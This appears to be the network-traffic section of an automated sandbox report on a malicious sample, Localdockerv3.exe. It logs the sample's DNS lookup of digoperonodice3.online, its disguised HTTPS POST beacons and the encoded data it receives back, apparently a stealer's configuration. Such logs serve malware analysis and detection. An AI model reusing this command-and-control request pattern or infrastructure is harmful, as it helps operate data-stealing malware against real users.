Dec 27, 2024 08:16:07.451070070 CET	49717	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:07.451086044 CET	443	49717	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:08.819494009 CET	443	49717	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:08.819571018 CET	49717	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:08.820776939 CET	49717	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:08.820782900 CET	443	49717	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:08.820975065 CET	443	49717	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:08.821791887 CET	49717	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:08.821821928 CET	49717	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:08.821825027 CET	443	49717	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:09.619201899 CET	443	49717	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:09.619272947 CET	443	49717	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:09.619471073 CET	49717	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:09.619733095 CET	49717	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:09.619749069 CET	443	49717	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:09.628319025 CET	49718	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:09.628401995 CET	443	49718	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:09.628551960 CET	49718	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:09.628856897 CET	49718	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:09.628870010 CET	443	49718	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:10.841835022 CET	443	49718	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:10.842098951 CET	49718	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:10.843424082 CET	49718	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:10.843447924 CET	443	49718	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:10.843717098 CET	443	49718	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:10.844564915 CET	49718	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:10.844607115 CET	49718	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:10.844613075 CET	443	49718	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:11.458291054 CET	443	49718	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:11.458463907 CET	443	49718	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:11.458719015 CET	49718	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:11.458839893 CET	443	49718	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:11.458880901 CET	49718	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:11.458880901 CET	49718	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:11.458903074 CET	443	49718	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:11.458935976 CET	443	49718	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:11.477114916 CET	49719	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:11.477173090 CET	443	49719	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:11.477252960 CET	49719	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:11.477551937 CET	49719	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:11.477565050 CET	443	49719	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:12.781722069 CET	443	49719	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:12.781810045 CET	49719	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:12.783092022 CET	49719	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:12.783102989 CET	443	49719	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:12.783351898 CET	443	49719	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:12.784162998 CET	49719	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:12.784188986 CET	49719	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:12.784193039 CET	443	49719	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:13.423371077 CET	443	49719	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:13.423446894 CET	443	49719	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:13.423490047 CET	49719	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:13.424290895 CET	49719	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:13.424307108 CET	443	49719	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:13.424324989 CET	49719	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:13.424330950 CET	443	49719	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:13.490767956 CET	49720	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:13.490832090 CET	443	49720	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:13.490901947 CET	49720	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:13.491450071 CET	49720	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:13.491462946 CET	443	49720	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:14.704049110 CET	443	49720	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:14.704164982 CET	49720	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:14.706588984 CET	49720	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:14.706605911 CET	443	49720	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:14.706907034 CET	443	49720	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:14.707613945 CET	49720	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:14.707658052 CET	49720	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:14.707664967 CET	443	49720	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:15.311872959 CET	443	49720	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:15.312036037 CET	443	49720	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:15.312094927 CET	49720	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:15.315459967 CET	49720	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:15.315485001 CET	443	49720	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:15.315500975 CET	49720	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:15.315514088 CET	443	49720	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:15.850256920 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:15.850367069 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:15.850459099 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:15.850723028 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:15.850745916 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:17.109630108 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:17.109797955 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:17.111320972 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:17.111342907 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:17.111641884 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:17.112526894 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:17.112658978 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:17.112689018 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:17.112791061 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:17.112822056 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:17.112946033 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:17.112987041 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:18.181848049 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:18.181925058 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:18.182049036 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:18.182188988 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:18.182219982 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:18.182238102 CET	49721	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:18.182245970 CET	443	49721	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:18.224566936 CET	49722	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:18.224638939 CET	443	49722	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:18.224723101 CET	49722	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:18.225017071 CET	49722	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:18.225027084 CET	443	49722	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:19.577060938 CET	443	49722	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:19.577126980 CET	49722	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:19.579226017 CET	49722	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:19.579235077 CET	443	49722	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:19.579515934 CET	443	49722	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:19.580205917 CET	49722	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:19.580226898 CET	49722	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:19.580229998 CET	443	49722	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:20.199409008 CET	443	49722	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:20.199598074 CET	443	49722	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:20.199664116 CET	49722	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:20.199749947 CET	443	49722	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:20.199796915 CET	49722	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:20.199796915 CET	49722	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:20.199820042 CET	443	49722	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:20.199841976 CET	443	49722	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:22.321963072 CET	49723	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:22.322097063 CET	443	49723	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:22.322206974 CET	49723	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:22.323144913 CET	49723	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:22.323180914 CET	443	49723	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:23.630182981 CET	443	49723	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:23.630280972 CET	49723	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:23.631505966 CET	49723	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:23.631520033 CET	443	49723	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:23.631912947 CET	443	49723	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:23.684098005 CET	49723	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:23.712938070 CET	49723	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:23.712960958 CET	49723	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:23.713201046 CET	443	49723	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:24.333190918 CET	443	49723	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:24.333268881 CET	443	49723	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:24.333340883 CET	49723	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:24.333425999 CET	49723	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:24.333455086 CET	443	49723	172.67.153.243	192.168.2.8
Dec 27, 2024 08:16:24.333468914 CET	49723	443	192.168.2.8	172.67.153.243
Dec 27, 2024 08:16:24.333475113 CET	443	49723	172.67.153.243	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:15:50.858737946 CET	55398	53	192.168.2.8	1.1.1.1
Dec 27, 2024 08:15:51.260879993 CET	53	55398	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 08:15:50.858737946 CET	192.168.2.8	1.1.1.1	0xef0f	Standard query (0)	digoperonodice3.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 08:15:51.260879993 CET	1.1.1.1	192.168.2.8	0xef0f	No error (0)	digoperonodice3.online		172.67.153.243	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:15:51.260879993 CET	1.1.1.1	192.168.2.8	0xef0f	No error (0)	digoperonodice3.online		104.21.12.244	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

digoperonodice3.online

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49711	172.67.153.243	443	1296	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:15:52 UTC	364	OUT	POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Content-Length: 96 Host: digoperonodice3.online
2024-12-27 07:15:52 UTC	96	OUT	Data Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 00 00 00 00 00 fe ff ff ff 2d 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-12-27 07:15:53 UTC	883	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:15:53 GMT Transfer-Encoding: chunked Connection: close catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHvK1FedFBBkpVd40DWUBcgm7H6%2FRGSp1yy9%2BJPXeXIqiDkcz7Zfx%2BC63vvM%2BzbNR8CBt8apaeaUy1q5CjWvjQhARoLlkeCNbOyxB%2FgG%2BkQmCxA8SM7%2Fx3IDMLqxpsvyiyook8YrZiZ6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f87859faa4b422d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7897&min_rtt=2158&rtt_var=4427&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2856&recv_bytes=1096&delivery_rate=1353104&cwnd=232&unsent_bytes=0&cid=d0a198422cb3aaf8&ts=940&x=0"
2024-12-27 07:15:53 UTC	17	IN	Data Raw: 63 0d 0a 00 00 00 00 a8 bd 5c 27 d5 84 00 00 0d 0a Data Ascii: c\'
2024-12-27 07:15:53 UTC	1369	IN	Data Raw: 33 32 65 36 0d 0a 00 00 00 00 c2 05 f5 08 10 00 04 00 c7 04 03 08 02 11 00 5e c7 27 c2 05 a4 89 88 07 9e 44 f4 54 11 0b 26 06 14 00 23 00 b9 08 03 08 02 11 00 cb b9 27 11 0b a0 84 aa 1b 39 00 94 49 60 6d 77 67 6b 76 60 67 65 6a 65 76 7d 58 48 6b 67 65 68 24 57 70 6b 76 65 63 61 58 68 61 72 61 68 60 66 0e 0b 37 08 10 00 04 00 c7 04 03 08 02 11 00 eb c7 27 0e 0b aa f2 3e 7d 90 3f 42 2e 38 03 94 0e 14 00 07 00 b9 08 03 08 02 11 00 d8 b9 27 38 03 a0 84 aa 1b 39 00 94 49 47 51 56 56 41 4a 50 9a 08 ae 08 14 00 07 00 b9 08 03 08 02 11 00 a2 b9 27 9a 08 a0 84 aa 1b 39 00 94 49 45 6a 7d 40 61 77 6f 4f 0b 26 0d 14 00 23 00 b9 08 03 08 02 11 00 4a b9 27 4f 0b a0 84 aa 1b 39 00 94 49 57 6b 62 70 73 65 76 61 58 69 6b 6a 61 76 6b 29 74 76 6b 6e 61 67 70 58 69 6b 6a 61 Data Ascii: 32e6^'DT&#'9I`mwgkv`gejev}XHkgeh$WpkvecaXharah`f7'>}?B.8'89IGQVVAJP'9IEj}@awoO&#J'O9IWkbpsevaXikjavk)tvknagpXikja
2024-12-27 07:15:53 UTC	1369	IN	Data Raw: 46 e1 79 38 7c 2c 05 6b 53 06 a4 0c 14 00 08 00 eb 08 03 08 02 11 00 02 eb 27 53 06 09 f5 74 ec 42 2e db 5f 92 26 42 6b 13 9a dd 07 10 05 cf 06 10 00 04 00 c7 04 03 08 02 11 00 cb c7 27 10 05 dc 9e dd dc e7 57 a1 8f bc 05 24 00 10 00 04 00 c7 04 03 08 02 11 00 5e c7 27 bc 05 1c b1 1e c8 26 7c 62 9b 2a 04 91 05 10 00 04 00 c7 04 03 08 02 11 00 cb c7 27 2a 04 92 19 2c 47 a3 d4 50 14 d7 07 df 0c 14 00 05 00 b9 08 03 08 02 11 00 d8 b9 27 d7 07 a0 84 aa 1b 39 00 94 49 2e 2a 68 60 66 59 0c a8 08 14 00 08 00 b9 08 03 08 02 11 00 da b9 27 59 0c a0 84 aa 1b 39 00 94 49 67 61 76 70 3d 2a 60 66 09 0d 03 0f 14 00 08 00 eb 08 03 08 02 11 00 0b eb 27 09 0d f7 0e c3 1a 92 a5 91 2d 69 dd f5 9d c3 11 97 75 a0 01 09 0b 10 00 04 00 c7 04 03 08 02 11 00 02 c7 27 a0 01 ee 08 Data Ascii: Fy8\|,kS'StB._&Bk'W$^'&\|b',GP'9I.h`fY'Y9Igavp=`f'-iu'
2024-12-27 07:15:53 UTC	1369	IN	Data Raw: 08 00 b9 08 03 08 02 11 00 d8 b9 27 8b 0b a0 84 aa 1b 39 00 94 49 74 76 6b 62 6d 68 61 77 21 04 ea 05 14 00 0c 00 b9 08 03 08 02 11 00 0b b9 27 21 04 a0 84 aa 1b 39 00 94 49 71 68 70 76 65 72 6a 67 2a 6d 6a 6d a7 09 13 03 14 00 0d 00 b9 08 03 08 02 11 00 4a b9 27 a7 09 a0 84 aa 1b 39 00 94 49 65 76 69 6b 76 7d 2e 73 65 68 68 61 70 4c 04 6d 0c 14 00 0c 00 b9 08 03 08 02 11 00 02 b9 27 4c 04 a0 84 aa 1b 39 00 94 49 73 65 70 61 76 62 6b 7c 2a 61 7c 61 df 01 3a 08 14 00 11 00 b9 08 03 08 02 11 00 d8 b9 27 df 01 a0 84 aa 1b 39 00 94 49 67 6c 76 6b 69 6d 71 69 5b 66 76 6b 73 77 61 76 77 70 08 df 03 14 00 08 00 eb 08 03 08 02 11 00 5e eb 27 70 08 68 e5 1d 04 85 f9 a9 54 f6 36 2b 83 d4 4d af 0c b3 06 c1 0a 10 00 04 00 c7 04 03 08 02 11 00 0b c7 27 b3 06 c5 8e 95 Data Ascii: '9Itvkbmhaw!'!9IqhpverjgmjmJ'9Ievikv}.sehhapLm'L9Isepavbk\|a\|a:'9Iglvkimqi[fvkswavwp^'phT6+M'
2024-12-27 07:15:53 UTC	1369	IN	Data Raw: 08 0b 9f 04 10 00 04 00 c7 04 03 08 02 11 00 5e c7 27 08 0b c9 bc 10 8e f3 71 6c dd 70 09 31 03 14 00 08 00 eb 08 03 08 02 11 00 cb eb 27 70 09 fc 82 54 a9 56 42 a8 67 73 51 62 2e 07 f6 ae 3f 2b 09 4e 00 10 00 04 00 c7 04 03 08 02 11 00 4a c7 27 2b 09 5c 29 10 4b 67 e4 6c 18 09 02 94 05 14 00 08 00 eb 08 03 08 02 11 00 5e eb 27 09 02 94 f0 da be 71 35 3d c4 08 23 ec 39 20 81 3b 9c b3 07 e3 09 10 00 04 00 c7 04 03 08 02 11 00 5e c7 27 b3 07 04 af 8b 0f 3e 62 f7 5c 19 0c 45 03 14 00 01 00 b9 08 03 08 02 11 00 4a b9 27 19 0c a0 84 aa 1b 39 00 94 49 2e dd 0c 3e 09 14 00 22 00 b9 08 03 08 02 11 00 cb b9 27 dd 0c a0 84 aa 1b 39 00 94 49 69 61 77 77 61 6a 63 61 76 77 58 40 6d 77 67 6b 76 60 58 40 61 72 61 68 6b 74 69 61 6a 70 58 6f 61 7d 25 07 28 0f 14 00 08 00 Data Ascii: ^'qlp1'pTVBgsQb.?+NJ'+\)Kgl^'q5=#9 ;^'>b\EJ'9I.>"'9IiawwajcavwX@mwgkv`X@arahktiajpXoa}%(
2024-12-27 07:15:53 UTC	1369	IN	Data Raw: 00 b9 08 03 08 02 11 00 02 b9 27 e7 0a a0 84 aa 1b 39 00 94 49 31 3c 32 33 36 35 34 35 37 31 33 33 30 37 34 3c 3c 3d 30 cc 02 93 09 14 00 08 00 eb 08 03 08 02 11 00 d8 eb 27 cc 02 23 59 19 8d 67 6a 91 4b 8f 8a 2f 0a 36 de 97 13 b1 0a f4 01 14 00 08 00 b9 08 03 08 02 11 00 d8 b9 27 b1 0a a0 84 aa 1b 39 00 94 49 74 76 6b 62 6d 68 61 77 ec 04 74 01 10 00 04 00 c7 04 03 08 02 11 00 4a c7 27 ec 04 f7 34 e4 21 cd f9 98 72 a6 04 8b 03 14 00 08 00 b9 08 03 08 02 11 00 cb b9 27 a6 04 a0 84 aa 1b 39 00 94 49 77 61 70 70 6d 6a 63 77 cd 0e 7c 02 10 00 04 00 c7 04 03 08 02 11 00 0b c7 27 cd 0e 72 c5 41 9d e9 8e 3c ce 25 0c 32 07 10 00 04 00 c7 04 03 08 02 11 00 4a c7 27 25 0c d9 5e 7f 11 e2 72 f6 47 62 04 ee 0e 10 00 04 00 c7 04 03 08 02 11 00 0b c7 27 62 04 76 9c 46 Data Ascii: '9I1<2365457133074<<=0'#YgjK/6'9ItvkbmhawtJ'4!r'9Iwappmjcw\|'rA<%2J'%^rGb'bvF
2024-12-27 07:15:53 UTC	1369	IN	Data Raw: 08 00 b9 08 03 08 02 11 00 d5 b9 27 1f 00 a0 84 aa 1b 39 00 94 49 6c 65 76 60 73 65 76 61 17 0c 1f 02 10 00 04 00 c7 04 03 08 02 11 00 4a c7 27 17 0c 9f 3a 69 e6 a4 16 e0 b0 c9 0e a1 0d 14 00 08 00 eb 08 03 08 02 11 00 0b eb 27 c9 0e 0d 6b dd 43 fc a1 3f f3 93 b8 eb c4 ad 15 39 ab 6f 00 27 0e 10 00 04 00 c7 04 03 08 02 11 00 5e c7 27 6f 00 39 c1 cd 36 03 0c b1 65 29 0d 0e 0a 10 00 04 00 c7 04 03 08 02 11 00 0b c7 27 29 0d 37 9b 39 d2 0d 56 45 81 56 01 06 01 14 00 1f 00 b9 08 03 08 02 11 00 0b b9 27 56 01 a0 84 aa 1b 39 00 94 49 72 6a 67 58 56 61 65 68 52 4a 47 58 67 68 6d 61 6a 70 58 48 6b 67 65 68 45 74 74 40 65 70 65 76 0a 0e 06 10 00 04 00 c7 04 03 08 02 11 00 cb c7 27 76 0a ba 30 0d e8 81 f9 71 bb 20 0c 4b 04 14 00 03 00 b9 08 03 08 02 11 00 a2 b9 27 Data Ascii: '9Ilev`sevaJ':i'kC?9o'^'o96e)')79VEV'V9IrjgXVaehRJGXghmajpXHkgehEtt@epev'v0q K'
2024-12-27 07:15:53 UTC	1369	IN	Data Raw: 57 fc 9d cc 9f 2f cf f7 ad 07 e4 02 10 00 04 00 c7 04 03 08 02 11 00 a2 c7 27 ad 07 e0 0e b7 58 da c3 cb 0b a5 09 99 02 10 00 04 00 c7 04 03 08 02 11 00 02 c7 27 a5 09 57 bd a9 c8 54 f8 a4 a0 27 03 6b 0c 14 00 08 00 eb 08 03 08 02 11 00 0b eb 27 27 03 b3 6e d2 a2 6f b5 ac 64 2d bd e4 25 3e 01 aa 3c 52 0e 06 0e 14 00 08 00 b9 08 03 08 02 11 00 5e b9 27 52 0e a0 84 aa 1b 39 00 94 49 2e 2a 69 6b 7e 68 7e 30 2a 06 fb 08 14 00 08 00 eb 08 03 08 02 11 00 80 eb 27 2a 06 34 8e 26 a1 dc dd 01 3d ab 5d 10 26 8d 69 07 65 51 0a 1b 06 14 00 4f 00 b9 08 03 08 02 11 00 d8 b9 27 51 0a a0 84 aa 1b 39 00 94 49 4d 6a 60 61 7c 61 60 40 46 58 67 6c 76 6b 69 61 29 61 7c 70 61 6a 77 6d 6b 6a 5b 63 6b 6e 6c 67 60 63 67 74 66 74 62 6d 63 67 65 61 6e 74 62 6c 62 61 63 61 6f 60 63 Data Ascii: W/'X'WT'k''nod-%><R^'R9I.ik~h~0'*4&=]&ieQO'Q9IMj`a\|a`@FXglvkia)a\|pajwmkj[cknlg`cgtftbmcgeantblbacao`c
2024-12-27 07:15:53 UTC	1369	IN	Data Raw: 65 68 52 4a 47 78 02 5e 01 14 00 08 00 eb 08 03 08 02 11 00 d8 eb 27 78 02 81 41 fd 7d a8 f8 48 62 1b 92 cb fa f9 4c 4e 3a c0 00 40 01 14 00 15 00 b9 08 03 08 02 11 00 0b b9 27 c0 00 a0 84 aa 1b 39 00 94 49 51 68 70 76 65 52 4a 47 58 71 68 70 76 65 72 6a 67 2a 6d 6a 6d 7a 05 55 05 10 00 04 00 c7 04 03 08 02 11 00 4a c7 27 7a 05 9c ad fc de a7 60 80 8d 53 08 49 07 14 00 08 00 eb 08 03 08 02 11 00 d8 eb 27 53 08 a1 b8 8b f7 15 06 bb 97 3f 6b bd 70 44 b2 bd cf 28 02 90 02 14 00 01 00 b9 08 03 08 02 11 00 4a b9 27 28 02 a0 84 aa 1b 39 00 94 49 2e 34 08 5c 0b 14 00 08 00 eb 08 03 08 02 11 00 0b eb 27 34 08 23 0d f8 a5 d1 47 df 3f bc de ce 22 80 f3 d9 67 ba 0d 29 02 14 00 09 00 b9 08 03 08 02 11 00 a2 b9 27 ba 0d a0 84 aa 1b 39 00 94 49 71 77 61 76 2a 67 6b 6a Data Ascii: ehRJGx^'xA}HbLN:@'9IQhpveRJGXqhpverjgmjmzUJ'z`SI'S?kpD(J'(9I.4\'4#G?"g)'9Iqwavgkj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49713	172.67.153.243	443	1296	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:15:55 UTC	483	OUT	POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E Content-Length: 53 Host: digoperonodice3.online
2024-12-27 07:15:55 UTC	53	OUT	Data Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 03 00 00 00 00 fe ff ff ff 02 00 00 00 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-12-27 07:15:55 UTC	755	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:15:55 GMT Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K16LubgJSZ7YE82A4PT9NlNrzH5im%2BQt3Kz37yDByAoD%2BEB6kSKQf6sXIArACac2cgraRngZn6lbLfKf1v6%2FEW%2FJj7JRWOBvrInXp2Lr5dYozMbaDLk0Oqe1PjCgoZYINc5BFA9OnxC1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8785b03877437f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1628&rtt_var=636&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2857&recv_bytes=1172&delivery_rate=1793611&cwnd=79&unsent_bytes=0&cid=2ee7148847d83a65&ts=617&x=0"
2024-12-27 07:15:55 UTC	24	IN	Data Raw: 31 32 0d 0a 00 00 00 00 fe ff ff ff 02 00 00 00 00 00 00 00 91 90 0d 0a Data Ascii: 12
